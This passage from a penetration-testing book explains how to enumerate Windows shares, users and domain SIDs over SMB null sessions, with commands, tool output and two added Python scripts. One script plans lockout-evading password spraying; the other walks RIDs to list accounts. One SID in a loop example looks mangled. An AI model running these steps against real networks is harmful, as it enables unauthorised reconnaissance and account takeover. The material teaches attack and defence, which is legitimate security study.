Popularity: 5
Simplicity: 7
Impact: 3
Risk Rating: 5
One of Windows’ most serious Achilles’ heels has traditionally been its default reliance on the Common Internet File System/Server Message Block (CIFS/SMB;
hereafter, just SMB) networking protocols. The SMB specs include APIs that return rich information about a machine via TCP ports 139 and 445, even to unauthenticated users.
The first step in accessing these APIs remotely is creating just such an unauthenticated connection to a Windows system by using the so-called “null session” command, assuming TCP port 139 or 445 is shown listening by a previous port scan:
C:\>net use \\192.168.202.33\IPC$ "" /u:""
The command completed successfully.
This syntax connects to the hidden interprocess communications “share” (IPC$) at IP address 192.168.202.33 as the built-in anonymous user (/u: "") with a null ("") password.
If successful, the attacker now has an open channel over which to attempt all the various techniques outlined in the rest of this section to pillage as much information as possible from the target: network information, shares, users, groups, Registry keys, and so on.
Almost all the information-gathering techniques described in this section on host enumeration take advantage of this single out-of-the-box security failing of Windows.
Whether you’ve heard it called the “Red Button” vulnerability, null session connections, or anonymous logon, it can be the single most devastating network foothold sought by intruders.
Microsoft has made some progress toward disabling null sessions in default client configurations. Windows client products from XP onward block null sessions out of the box. Null sessions are still available by default on Windows Server products (including Server 2003 and 2008 as of Build 1715); however, access to sensitive information is blocked by the default security policy configuration (some information is still available if the machine is configured as a domain controller). Next we discuss the various attacks that can be performed over null sessions against a Windows Server 2003 domain controller (these attacks are blocked by default in Server 2008).
Enumerating Shares
With a null session established, we can also fall back on good ol' net view to enumerate shares on remote systems:
C:\>net view \\vito
Shared resources at \\192.168.7.45

VITO

Share name   Type   Used as   Comment
-------------------------------------------------------------------------------
NETLOGON     Disk             Logon server share
Test         Disk             Public access
Finance      Disk             Transaction records
Web          Disk             Webroot for acme.com
The command completed successfully.
Three other good share-enumeration tools from the Resource Kit are rmtshare, srvcheck, and srvinfo (using the –s switch). Rmtshare generates output similar to net view. Srvcheck displays shares and authorized users, including hidden shares, but it requires privileged access to the remote system to enumerate users and hidden shares.
Srvinfo’s –s parameter lists shares along with a lot of other potentially revealing information.
Enumerating Trusted Domains
Once a null session is set up to one of the machines in the enumerated domain, the nltest /server:<server_name> /domain_trusts syntax can be used to learn about other Windows domains with trust relationships to the first. This information will come in handy when we discuss Local Security Authority (LSA) secrets in Chapter 7.
Enumerating Users
In the good ol' days of hacking, Windows machines would cough up account information just about as easily as they revealed shares. Some key changes to the default configuration around null session access in Windows XP and later have put a stop to all that. For this reason, the following examples were run against a Windows Server 2003 domain controller; the same commands would be denied against a default stand-alone or member server configuration.
A few Resource Kit tools can provide more information about users via null sessions, such as the usrstat, showgrps, local, and global utilities. We typically use the local utility to dump the members of the local Administrators group on a target server:
C:\>local administrators \\caesars
Administrator
Enterprise Admins
Domain Admins
backadmin
Note that the RID 500 account is always listed first in this output and that additional administrative accounts (such as backadmin) are listed after groups.
The global tool can be used in the same way to find the members of the Domain Admins:
C:\>global "domain admins" \\caesars
Administrator
backadmin
In the next section, we discuss some all-in-one enumeration tools that also do a great job of enumerating users, in addition to shares, trusts, and other tantalizing information.
All-in-One SMB Enumeration Tools
The tools we've shown you so far are all single-purposed.
In the following paragraphs, we introduce some all-purpose enumeration tools that perform all of the SMB enumeration techniques we’ve seen so far—and then some!
One of the best tools for enumerating Windows systems is DumpSec (formerly DumpACL) from SomarSoft. Few tools deserve their place in the Windows security auditor’s toolbox more than DumpSec. It audits everything from file system permissions to services available on remote systems. DumpSec has an easy-to-use graphical interface, or it can be run from the command line, making for easy automation and scripting.
To use DumpSec anonymously, first set up a null session to a remote system. Then, in DumpSec, choose Report | Select Computer and type in the name of the remote system.
(Make sure to use the exact name you used to create the null session, or you will get an error.) Then select whatever report you want to run from the Reports menu. Figure 4-2 shows DumpSec being used to dump share information from a remote computer by choosing Report | Dump Permissions For Shares. Note that this displays both hidden and non-hidden shares.
Figure 4-2 DumpSec reveals all shares over a null session.
Dumping shares over a null session is still possible by default on Windows Server 2003. DumpSec can also dump user account information, but only if the target system has been configured to permit release of such information over a null session (some might say misconfigured). Windows Server 2003 domain controllers permit this activity by default, so the following examples were run against that target. In this example, we use DumpSec from the command line to generate a file containing user information from the remote computer (remember that DumpSec requires a null session with the target computer to operate):
C:\>dumpsec /computer=\\caesars /rpt=usersonly /saveas=tsv /outfile=c:\temp\users.txt
C:\>cat c:\temp\users.txt
5/26/2003 3:39 PM - Somarsoft DumpSec (formerly DumpAcl) - \\caesars
UserName          FullName                                              Comment
Administrator                                                           Built-in account for administering the computer/domain
backadmin         backadmin
Guest                                                                   Built-in account for guest access to the computer/domain
IUSR_CAESARS      Internet Guest Account                                Built-in account for anonymous access to Internet Information Services
IWAM_CAESARS      Launch IIS Process Account                            Built-in account for Internet Information Services to start out of process applications
krbtgt            Key Distribution Center Service Account
SUPPORT_388945a0  CN=Microsoft Corporation,L=Redmond,S=Washington,C=US  This is a vendor's account for the Help and Support Service
Using the DumpSec GUI, many more information fields can be included in the report, but the format shown here usually ferrets out troublemakers. For example, we once came across a server that stored the password for the renamed Administrator account in the FullName field!
DumpSec is also capable of gathering policies, user rights, and services over a null session, but these items are restricted by default on Windows.
It took the RAZOR team from BindView to throw just about every SMB enumeration feature into one tool, and then some. They called it enum—fittingly enough for this chapter. The following listing of the available command-line switches for this tool demonstrates how comprehensive it is.
C:\>enum
usage: enum [switches] [hostname|ip]
  -U: get userlist
  -M: get machine list
  -N: get namelist dump (different from -U|-M)
  -S: get sharelist
  -P: get password policy information
  -G: get group and member list
  -L: get LSA policy information
  -D: dictionary crack, needs -u and -f
  -d: be detailed, applies to -U and -S
  -c: don't cancel sessions
  -u: specify username to use (default "")
  -p: specify password to use (default "")
  -f: specify dictfile to use (wants -D)
Enum even automates the setup and teardown of null sessions. Of particular note is the password policy enumeration switch, -P, which tells remote attackers whether they can remotely guess user account passwords (using –D, -u, and –f) until they find a weak one. The following example has been edited for brevity to show enum in action against a Windows Server 2003 domain controller:
C:\>enum -U -d -P -L -c caesars
[...]
lockout duration: 30 mins
lockout reset: 30 mins
opening lsa policy... success.
paged pool limit: 33554432
non paged pool limit: 1048576
min work set size: 65536
max work set size: 251658240
pagefile limit: 0
time limit: 458672
trusted domains:
  indeterminate
netlogon done by a PDC server
getting user list (pass 1, index 0)... success, got 7.
  Administrator (Built-in account for administering the computer/domain)
  attributes:
  backadmin
  attributes: disabled
  Guest (Built-in account for guest access to the computer/domain)
  attributes: disabled no_passwd
  IUSR_CAESARS (Built-in account for anonymous access to Internet Information Services)
  attributes: no_passwd
  IWAM_CAESARS (Built-in account for Internet Information Services to start out of process applications)
  attributes: no_passwd
  krbtgt (Key Distribution Center Service Account)
  attributes: disabled
  SUPPORT_388945a0 (This is a vendor's account for the Help and Support Service)
  attributes: disabled
Enum will also perform remote password guessing one user at a time using the –D –u <username> -f <dictfile> arguments.
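The reason the -P switch matters is that the lockout threshold and reset window decide how many guesses per account you can afford before you lock real users out. The following Python script is an added example (it is not part of the book and not code from enum) that turns a policy like the one enum reports into a spraying schedule: at most threshold minus a safety margin guesses per account per reset window, with rounds spaced by the reset time. The threshold value, user list and password list are constructed sample input; the 30-minute duration and reset come from the enum output above.

```python
"""Turn the lockout policy reported by enum -P into a safe guessing budget.

Added example, not part of the book or of enum. Only the threshold, reset and
duration fields are modelled; the threshold of 5 is an assumption, the
30-minute values match the sample enum output.
"""
from dataclasses import dataclass
from typing import List, Optional, Sequence, Tuple


@dataclass(frozen=True)
class LockoutPolicy:
    threshold: int          # bad logons before lockout; 0 means accounts never lock
    reset_minutes: int      # window after which the bad-logon counter clears
    duration_minutes: int   # how long a locked account stays locked


def guesses_per_window(policy: LockoutPolicy, margin: int = 1) -> Optional[int]:
    """Bad guesses one account can absorb per reset window without locking.

    None means unlimited (threshold 0), which is what an attacker hopes to see.
    `margin` leaves room for the user's own typo so an audit does not lock out
    real people.
    """
    if policy.threshold <= 0:
        return None
    return max(policy.threshold - margin, 0)


def plan(users: Sequence[str], passwords: Sequence[str], policy: LockoutPolicy,
         margin: int = 1) -> List[Tuple[int, List[Tuple[str, str]]]]:
    """Spread (user, password) attempts into rounds.

    Each round is (minutes to wait before it starts, attempts). Within a round
    every account gets at most guesses_per_window() attempts; rounds are spaced
    by the reset window so the bad-logon counter has cleared before the next batch.
    """
    per_window = guesses_per_window(policy, margin)
    if per_window is None:
        return [(0, [(u, p) for p in passwords for u in users])]
    if per_window == 0:
        return []   # a single failure locks the account: do not guess at all
    rounds = []
    for i in range(0, len(passwords), per_window):
        chunk = passwords[i:i + per_window]
        wait = 0 if i == 0 else policy.reset_minutes
        rounds.append((wait, [(u, p) for p in chunk for u in users]))
    return rounds


def total_minutes(rounds: List[Tuple[int, List[Tuple[str, str]]]]) -> int:
    """Wall-clock minutes the schedule spends waiting between rounds."""
    return sum(wait for wait, _ in rounds)


# Constructed sample input (threshold assumed; reset/duration from the enum output).
POLICY = LockoutPolicy(threshold=5, reset_minutes=30, duration_minutes=30)
USERS = ["Administrator", "backadmin"]
PASSWORDS = ["password", "Password1", "Welcome1", "Summer2003",
             "acme", "letmein", "changeme"]

if __name__ == "__main__":
    schedule = plan(USERS, PASSWORDS, POLICY)
    for wait, attempts in schedule:
        print(f"wait {wait:3d} min, then {len(attempts)} attempts, e.g. {attempts[0]}")
    print("minutes spent waiting:", total_minutes(schedule))
```

With threshold 5 and margin 1 the seven passwords split into a round of four per account and a round of three, separated by the 30-minute reset; with threshold 0 (no lockout) everything goes in one round, which is exactly the condition enum's -D mode exploits.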
Another great enumeration tool written by Sir Dystic, called nete (NetE), will extract a wealth of information from a null session connection. We like to use the /0 switch to perform all checks, but here’s the command syntax for nete to give some idea of the comprehensive information it can retrieve via null session:
C:\>nete
NetE v.96  Questions, comments, etc. to [email protected]
Usage: NetE [Options] \\MachinenameOrIP
Options:
  /0 - All NULL session operations
  /A - All operations
  /Q - Platform specific info
  /P - Printer ports and info
  /Y - Remote registry trees
  /Z - Trusted domains
Bypassing RestrictAnonymous
Following the release of NT 4 Service Pack 3, Microsoft attempted to defend against the null session enumeration vulnerability by creating the RestrictAnonymous configuration option (see the upcoming "SMB Enumeration Countermeasures" section). However, some enumeration tools and techniques will still extract sensitive data from remote systems, even if RestrictAnonymous is configured to restrict it. We'll discuss some of these tools next.
Two extremely powerful Windows enumeration tools are sid2user and user2sid by Evgenii Rudnyi. They are command-line tools that look up Windows SIDs from username input and vice versa. (SIDs are introduced and described in Chapter 2.) To use them remotely requires null session access to the target machine. The following techniques will work against out-of-the-box Windows Server 2003 and Server 2008 domain controllers (since the policy Allow Anonymous SID/Name Translation is enabled by default).
First, we extract a domain SID using user2sid:
C:\>user2sid \\192.168.202.33 "domain users"
S-1-5-21-8915387-1645822062-1819828000-513
Number of subauthorities is 5
Domain is WINDOWSNT
Length of SID in memory is 28 bytes
Type of SID is SidTypeGroup
The first line of output is the full SID of the Domain Users group: the string beginning with S-1 and separated by hyphens. Everything before the final hyphen (S-1-5-21-8915387-1645822062-1819828000) is the domain SID we are after; the trailing 513 is the RID of Domain Users, and it is the same on every domain.
As we saw in Chapter 2, the numeric string following the last hyphen is called the relative identifier (RID), and it is predefined for built-in Windows users and groups such as Administrator or Guest. For example, the Administrator user’s RID is always 500, and the Guest user’s RID is 501. Armed with this tidbit, a hacker can use sid2user and the known SID string appended with a RID of 500 to find the name of the Administrator’s account (even if it’s been renamed):
C:\>sid2user \\192.168.202.33 5 21 8915387 1645822062 1819828000 500
Name is godzilla
Domain is WINDOWSNT
Type of SID is SidTypeUser
Note that the S-1 and hyphens are omitted. Another interesting factoid is that the first account created on any Windows NT–family local system or domain is assigned an RID of 1000, and each subsequent object gets the next sequential number after that (1001, 1002, 1003, and so on—RIDs are not reused on the current installation). Thus, once the SID is known, a hacker can basically enumerate every user and group on an NT/2000 system, past and present.
Here’s a simple example of how to script user2sid/sid2user to loop through all of the available user accounts on a system. Before running this script, we first determine the SID for the target system using user2sid over a null session, as shown previously.
Recalling that NT/2000 assigns new accounts an RID beginning with 1000, we then execute the following loop using the NT/2000 shell command FOR and the sid2user tool (see earlier) to enumerate up to 50 accounts on a target:
C:\>for /L %i IN (1000,1,1050) DO sid2user \\acmepdc1 5 21 1915163094 1258472701648912389 %i >> users.txt
C:\>cat users.txt
Name is IUSR_ACMEPDC1
Domain is ACME
Type of SID is SidTypeUser
Name is MTS Trusted Impersonators
Domain is ACME
Type of SID is SidTypeAlias
. . .
This raw output could be sanitized by piping it through a filter to leave just a list of usernames. Of course, the scripting environment is not limited to the NT shell—Perl, VBScript, or whatever is handy will do. As one last reminder before we move on, realize that this example will successfully dump users as long as TCP port 139 or 445 is open on the target, even if RestrictAnonymous is configured to the moderately conservative setting of “1” (again, see the upcoming “SMB Enumeration Countermeasures” section for explicit RestrictAnonymous values and their meaning).
The UserDump tool, discussed shortly, automates this “SID walking” enumeration technique.
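The SID arithmetic behind the FOR loop and behind UserDump's walk is easy to get wrong by hand, so here is an added example in Python (not code from the book, nor from user2sid, sid2user or UserDump) that does the same work programmatically: it parses a SID, separates the domain SID from the RID, renders the space-separated argument form sid2user expects, and walks RIDs 500, 501 and 1000 upward against a lookup function. The directory it walks is a constructed in-memory table standing in for what sid2user returns over a null session; it includes a deleted account so the walk shows why a missing RID must not stop the loop. It also rejects any sub-authority that does not fit in 32 bits, a quick sanity check for SIDs copied by hand.

```python
"""SID parsing and RID walking, modelled on the user2sid/sid2user loop in the text.

Added example, not from the book or the tools it describes. SAMPLE_DIRECTORY is
constructed data standing in for the target's responses.
"""
from typing import Callable, Dict, List, Optional, Tuple

MAX_SUBAUTH = 2**32 - 1   # every sub-authority is an unsigned 32-bit integer

# Relative identifiers that are the same on every Windows domain or machine.
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt",
                   512: "Domain Admins", 513: "Domain Users"}


def parse_sid(sid: str) -> Tuple[int, int, List[int]]:
    """Split 'S-R-A-s1-s2-...' into (revision, identifier authority, sub-authorities)."""
    parts = sid.strip().split("-")
    if len(parts) < 4 or parts[0].upper() != "S":
        raise ValueError(f"not a SID: {sid!r}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    for s in subs:
        if not 0 <= s <= MAX_SUBAUTH:
            # More than 32 bits means digits were dropped or two sub-authorities
            # were run together when the SID was transcribed.
            raise ValueError(f"sub-authority {s} does not fit in 32 bits")
    return revision, authority, subs


def split_domain_rid(sid: str) -> Tuple[str, int]:
    """Everything before the last hyphen is the domain (or machine) SID; the rest is the RID."""
    revision, authority, subs = parse_sid(sid)
    domain = "-".join(["S", str(revision), str(authority), *map(str, subs[:-1])])
    return domain, subs[-1]


def sid2user_args(domain_sid: str, rid: int) -> str:
    """Render the argument form sid2user expects: 'S-1' and hyphens dropped, RID appended."""
    _, authority, subs = parse_sid(domain_sid)
    return " ".join(map(str, [authority, *subs, rid]))


def walk_rids(lookup: Callable[[str], Optional[Tuple[str, str]]], domain_sid: str,
              start: int = 1000, count: int = 50) -> List[Tuple[int, str, str]]:
    """Resolve RID 500, 501 and start..start+count-1 under domain_sid.

    lookup(sid) returns (name, sid_type) or None, the equivalent of sid2user's
    'LookupAccountSid failed' case. Gaps are expected: RIDs of deleted accounts
    are never reused, so a miss must not end the walk.
    """
    found = []
    for rid in [500, 501, *range(start, start + count)]:
        hit = lookup(f"{domain_sid}-{rid}")
        if hit is not None:
            found.append((rid, hit[0], hit[1]))
    return found


# Constructed sample directory: the answers the target would give for each SID.
DOMAIN_SID = "S-1-5-21-8915387-1645822062-1819828000"
SAMPLE_DIRECTORY: Dict[str, Tuple[str, str]] = {
    f"{DOMAIN_SID}-500": ("godzilla", "SidTypeUser"),        # renamed Administrator
    f"{DOMAIN_SID}-501": ("Guest", "SidTypeUser"),
    f"{DOMAIN_SID}-513": ("Domain Users", "SidTypeGroup"),
    f"{DOMAIN_SID}-1000": ("IUSR_CAESARS", "SidTypeUser"),
    f"{DOMAIN_SID}-1001": ("MTS Trusted Impersonators", "SidTypeAlias"),
    # RID 1002 belonged to a deleted account and stays unassigned.
    f"{DOMAIN_SID}-1003": ("backadmin", "SidTypeUser"),
}


def sample_lookup(sid: str) -> Optional[Tuple[str, str]]:
    """Stand-in for sid2user: None where the RID does not exist."""
    return SAMPLE_DIRECTORY.get(sid)


if __name__ == "__main__":
    domain, rid = split_domain_rid(DOMAIN_SID + "-513")
    print(f"domain SID {domain}, RID {rid} ({WELL_KNOWN_RIDS.get(rid, '?')})")
    print("sid2user args for RID 500:", sid2user_args(domain, 500))
    for rid, name, kind in walk_rids(sample_lookup, domain, count=10):
        print(f"{rid:5d}  {name:28s} {kind}")
```

Swapping sample_lookup for a function that shells out to sid2user (or any LookupAccountSid wrapper) over an established null session turns this into the scripted walk the text describes, with the 32-bit check catching a mangled SID before fifty useless queries go over the wire.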
Configure the Security Policy setting Network Access: Allow Anonymous SID/Name Translation to Disabled in Windows XP and later to prevent this attack.
The UserInfo tool from Tim Mullen ([email protected]) will enumerate user information over a null session even if RestrictAnonymous is set to 1. By calling the NetUserGetInfo API at information level 3, UserInfo reaches the same sensitive information as tools like DumpSec that are stymied by RestrictAnonymous = 1. Here's UserInfo querying the Administrator account on a remote system with RestrictAnonymous = 1:
C:\>userinfo \\victim.com Administrator
UserInfo v1.5 - [email protected]
Querying Controller \\mgmgrand
A related tool from Tim Mullen is UserDump. It enumerates the remote system's SID and then "walks" expected RID values to gather all user account names. UserDump takes the name of a known user or group (used to obtain the SID) and a maximum number of queries; it always resolves RID 500 (Administrator) first and then walks from RID 1001 up to 1001 plus the maximum number of queries specified. (A MaxQueries setting of 0 or blank returns only RIDs 500 and 1001.) Here's a sample of UserDump in action against a Windows Server 2003 domain controller:
C:\>userdump \\mgmgrand guest 10
UserDump v1.11 - [email protected]
Querying Controller \\mgmgrand
USER INFO
Username:       Administrator
Full Name:
Comment:        Built-in account for administering the computer/domain
User Comment:
User ID:        500
Primary Grp:    513
Privs:          Admin Privs
OperatorPrivs:  No explicit OP Privs
[snip]
LookupAccountSid failed: 1007 does not exist...
LookupAccountSid failed: 1008 does not exist...
LookupAccountSid failed: 1009 does not exist...
Get hammered at HammerofGod.Com!
Another tool called GetAcct by Urity performs this same SID walking technique. GetAcct has a graphical interface and can export results to a comma-separated file for later analysis. It does not require the presence of an Administrator or Guest account on the target server. GetAcct is shown in Figure 4-3, obtaining user account information from a system with RestrictAnonymous = 1.
Figure 4-3 GetAcct walks SIDs via null session, bypassing RestrictAnonymous = 1.
Walksam, one of three RPCTools from Todd Sabin, also walks the Security Accounts Manager (SAM) database and dumps out information about each user found. It supports both the "traditional" method of doing this via named pipes and the additional mechanisms used by Windows domain controllers. It can bypass RestrictAnonymous = 1 if null sessions are feasible. Here's an abbreviated example of walksam in action (note that a null session already exists with the target server):
C:\rpctools>walksam 192.168.234.44
rid 500: user Administrator
Userid: Administrator
Full Name:
Home Dir:
Home Drive:
Logon Script:
Profile:
Description: Built-in account for administering the computer/domain
Workstations:
Profile:
User Comment:
Last Logon: 7/21/2001 5:39:58.975
Last Logoff: never
Last Passwd Change: 12/3/2000 5:11:14.655
Acct. Expires: never
Allowed Passwd Change: 12/3/2000 5:11:14.655
Rid: 500
Primary Group Rid: 513
Flags: 0x210
Fields Present: 0xffffff
Bad Password Count: 0
Num Logons: 88
rid 501: user Guest
Userid: Guest
[etc.]
We hope you enjoyed this little stroll down memory lane. Next, we’re going to discuss some major improvements to Windows XP and later that essentially eliminate the need to worry about RestrictAnonymous.